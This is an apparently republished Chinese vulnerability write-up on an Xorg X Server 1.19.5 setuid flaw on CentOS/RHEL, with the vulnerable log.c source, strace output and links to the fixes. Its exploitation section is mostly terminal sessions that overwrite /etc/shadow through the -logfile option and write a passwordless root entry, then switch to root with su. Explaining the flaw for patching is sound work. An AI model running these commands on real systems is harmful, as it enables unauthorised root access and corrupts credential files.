Xorg X Server权限提升漏洞是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
任意文件覆盖导致的提权漏洞
由合天网安实验室翻译
描述:
X.org X Server应用程序允许低权限的用户在系统的任何位置创建或覆盖文件,包括特色文件(如:/etc/shadow)。
攻击条件:拥有普通用户的控制台会话权限
靶机:
-
CentOS-7 -
[narendra@localhost ~]$ uname -a -
Linux localhost.localdomain 4.18.11-1.el7.elrepo.x86_64 #1 SMP Sat Sep 29 09:42:38 EDT 2018 x86_64 x86_64 xGNU/Linux
X.Org X server 版本:1.19.5
分析:
在CentOS和RedHat服务器操作系统上,X.org X Server 可执行文件(/usr/bin/Xorg)具有SETUID权限。
-
[Dev@localhost ~]$ ls -la /usr/bin/Xorg -
-rwsr-xr-x. 1 root root 2409344 Apr 11 22:12 /usr/bin/Xorg
X.org X Server 应用程序中 LogInit()函数用来记录日志,X.org X Server 允许用户使用 “-logfile”选项指定日志文件。
如果系统上已存在与用户提供的"”同名的文件,则将其重命名为“.old”。完成此操作后,将使用用户提供的“”名称创建一个新文件,使用fopen()函数进行调用
Xorg-Server/os/log.c
-
244 const char * -
245 LogInit(const char *fname, const char *backup) -
246 { -
247 char *logFileName = NULL; -
248 -
249 if (fname && *fname) { -
250 if (displayfd != -1) { -
251 /* Display isn't set yet, so we can't use it in filenames yet. */ -
252 char pidstring[32]; -
253 snprintf(pidstring, sizeof(pidstring), "pid-%ld", -
254 (unsigned long) getpid()); -
255 logFileName = LogFilePrep(fname, backup, pidstring); -
256 saved_log_tempname = logFileName; -
257 -
258 /* Save the patterns for use when the display is named. */ -
259 saved_log_fname = strdup(fname); -
260 if (backup == NULL) -
261 saved_log_backup = NULL; -
262 else -
263 saved_log_backup = strdup(backup); -
264 } else -
265 logFileName = LogFilePrep(fname, backup, display); -
266 if ((logFile = fopen(logFileName, "w")) == NULL) -
267 FatalError("Cannot open log file /"%s/"/n", logFileName); -
268 setvbuf(logFile, NULL, _IONBF, 0); -
269 -
270 logFileFd = fileno(logFile);
可以使用 strace命令跟踪系统底层的 open() 调用过程
-
stat("mylogfile", 0x7ffcb9654ed0) &n-1 ENOENT (No such file or directory) -
open("mylogfile", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4 -
rt_sigaction(SIGALRM, {0x55b6e2c2ca70, [ALRM], SA_RESTORER|SA_RESTART, 0x7fb0353036d0}, NULL, 8) = 0
从跟踪日志可以看出,O_EXCL 标志没有设置,所以fopen() 函数会创建或者覆盖已有的文件。
漏洞利用:
主要利用以下3点:
1、fopen()调用的输入是用户可控的文件名
2、fopen()将创建或覆盖已存在的文件
3、可执行文件/usr/bin/Xorg具有setuid权限
/etc/shadow 文件覆盖测试
-
[Dev@localhost ~]$ uname -r -
3.10.0-862.el7.x86_64 -
[Dev@localhost ~]$ Xorg -version -
X.Org X Server 1.19.5 -
Release Date: 2017-10-12 -
X Protocol Version 11, Revision 0 -
Build Operating System: 2.6.32-696.18.7.el6.x86_64 -
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 -
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8 -
Build Date: 13 February 2018 02:39:52PM -
Build ID: xorg-x11-server 1.19.5-5.el7 -
Current version of pixman: 0.34.0 -
Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. -
[Dev@localhost ~] -
[Dev@localhost ~]$ id -
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 -
[Dev@localhost ~]$ -
[Dev@localhost ~]$ cd /etc -
[Dev@localhost etc]$ ls -la shadow -
----------. 1 root root 1650 Oct 6 05:03 shadow -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ cat shadow -
cat: shadow: Permission denied -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ Xorg -logfile shadow :1 #指定日志文件为shadow -
X.Org X Server 1.19.5 -
Release Date: 2017-10-12 -
X Protocol Version 11, Revision 0 -
Build Operating System: 2.6.32-696.18.7.el6.x86_64 -
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 -
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8 -
Build Date: 13 February 2018 02:39:52PM -
Build ID: xorg-x11-server 1.19.5-5.el7 -
Current version of pixman: 0.34.0 -
Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. -
Markers: (--) probed, (**) from config file, (==) default setting, -
(++) from command line, (!!) notice, (II) informational, -
(WW) warning, (EE) error, (NI) not implemented, (??) unknown. -
(++) Log file: "shadow", Time: Sat Oct 6 21:54:13 2018 -
(==) Using config directory: "/etc/X11/xorg.conf.d" -
(==) Using system config directory "/usr/share/X11/xorg.conf.d" -
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22) -
(II) Server terminated successfully (0). Closing log file. -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ ls -la shadow -
-rw-r--r--. 1 root Dev 53901 Oct 6 21:54 shadow -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ head shadow #写入成功 -
[ 11941.870] -
X.Org X Server 1.19.5 -
Release Date: 2017-10-12 -
[ 11941.870] X Protocol Version 11, Revision 0 -
[ 11941.870] Build Operating System: 2.6.32-696.18.7.el6.x86_64 -
[ 11941.870] Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 -
[ 11941.870] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8 -
[ 11941.870] Build Date: 13 February 2018 02:39:52PM -
[ 11941.870] Build ID: xorg-x11-server 1.19.5-5.el7 -
[ 11941.870] Current version of pixman: 0.34.0 -
[Dev@localhost etc]$
权限提升
-
[Dev@localhost ~]$ id #当前权限 -
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 -
[Dev@localhost ~]$ -
[Dev@localhost ~]$ cd /etc -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ ls -la shadow -
----------. 1 root root 1241 Oct 10 01:15 shadow -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ cat shadow #查看权限 -
cat: shadow: Permission denied -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1 #写入文件,root无密码 -
X.Org X Server 1.19.5 -
Release Date: 2017-10-12 -
X Protocol Version 11, Revision 0 -
Build Operating System: 3.10.0-693.17.1.el7.x86_64 -
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 -
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.x86_64 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8 -
Build Date: 11 April 2018 04:40:54PM -
Build ID: xorg-x11-server 1.19.5-5.el7 -
Current version of pixman: 0.34.0 -
Before reporting problems, check http://wiki.x.org -
to make sure that you have the latest version. -
Markers: (--) probed, (**) from config file, (==) default setting, -
(++) from command line, (!!) notice, (II) informational, -
(WW) warning, (EE) error, (NI) not implemented, (??) unknown. -
(++) Log file: "shadow", Time: Wed Oct 10 01:16:10 2018 -
(==) Using config directory: "/etc/X11/xorg.conf.d" -
(==) Using system config directory "/usr/share/X11/xorg.conf.d" -
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22) -
(II) Server terminated successfully (0). Closing log file. -
[Dev@localhost etc]$ ls -la shadow -
-rw-r--r--. 1 root Dev 53897 Oct 10 01:16 shadow -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ cat shadow | grep "root::" #写入文件成功 -
root::16431:0:99999:7::: -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ -
[Dev@localhost etc]$ su #切换到root用户 -
[root@localhost etc]# -
[root@localhost etc]# id #查看权限,提权成功 -
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
修复信息:
https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://lists.x.org/archives/xorg-announce/2018-October/002928.html
看完上述内容,你们掌握Xorg X Server权限提升漏洞是怎样的的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!
原创文章,作者:bd101bd101,如若转载,请注明出处:https://blog.ytso.com/tech/safety/222339.html